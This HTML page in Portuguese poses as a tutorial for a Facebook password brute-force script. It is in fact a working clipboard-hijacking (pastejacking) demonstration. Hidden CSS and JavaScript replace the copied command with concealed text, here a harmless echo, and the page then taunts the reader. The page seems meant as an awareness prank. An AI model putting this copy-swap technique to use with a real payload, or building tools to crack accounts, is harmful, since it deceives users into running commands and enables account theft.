<!DOCTYPE html>
<html>
    
<head>
<meta http-equiv="content-type" content="text/html">
<meta charset="UTF-8">
<title>Ataque de força bruta no facebook pelo windows</title>
<link href="https://fonts.googleapis.com/css?family=Oswald|Raleway" rel="stylesheet">
<body>

    <style>
        h1.titulo{
            margin-top: 35px;
            margin-left: 24%;
            font-family: 'Oswald', Arial, Helvetica, sans-serif;
            font-size: 32px;
            color: rgba(0,0,0,.8);
        }

        p.data{
            margin-top: 0px;
            margin-left: 24%;
            font-family: 'Raleway', Arial, Helvetica, sans-serif;
            font-size: 15px;
            color: #79828B;
        }

        p.texto{
            margin-top: 0px;
            margin-left: 24%;
            font-family: Helvetica, sans-serif;
            font-size: 18px;
            color: rgba(0,0,0,.8);
        }

        img.imagem{
            margin-top: 0px;
            margin-left: 24%;
            width: 47%;
            height: 39%;
        }

        .caixa{
            margin-top: 0px;
            margin-left: 24%;
            width: 47%;
            height: 47px;
            border-radius: 3px;
            background-color: rgba(0,0,0,.8);
        }

        pre.comando{
            padding: 10px;
            margin: 16px;
            font-family: Helvetica, sans-serif;
            font-size: 17px;
            color: #fff;
        }

        .malicious{
            width: 0;
            height: 0;
            border: none;
            rezize: none;
            background: none;
            opacity: 0;
        }
    </style>

    <h1 class="titulo">Ataque de força bruta no facebook pelo windows</h1>
    
    <p class="data">Sn4ff3 | Agosto 24, 2017</p>
    <p class="texto">Este software foi desenvolvido em Python, seu objetivo é quebrar senhas de<br> conta do Facebook com um ataque de força bruta.</p>
        
    <img class="imagem" src="http://i.imgur.com/LmxKoSZ.png">
 
    <h1 class="titulo">Execução do Script</h1>
            
    <p class="texto">Para isto abra o <strong>cmd</strong> e digite o seguinte comando:</p>

    <div class="caixa">
        <pre class="comando">Python fb-bruteforce.py
            <textarea type="text" class="malicious">echo "Olá Mundo!";</textarea>
        </pre>
    </div>

    <br><p class="texto">Pronto hasquer, vc copiou e colou sem prestar a atenção e foi hackeado kk</p>

    <script>
        const malicious = document.querySelectorAll('pre');
    
        for(let i in malicious){
            const code = malicious[i];
            code.addEventListener('copy', function(){
                code.querySelector('.malicious').select();
                document.execCommand('copy');
            });
        }
    </script>

</body>
</html>
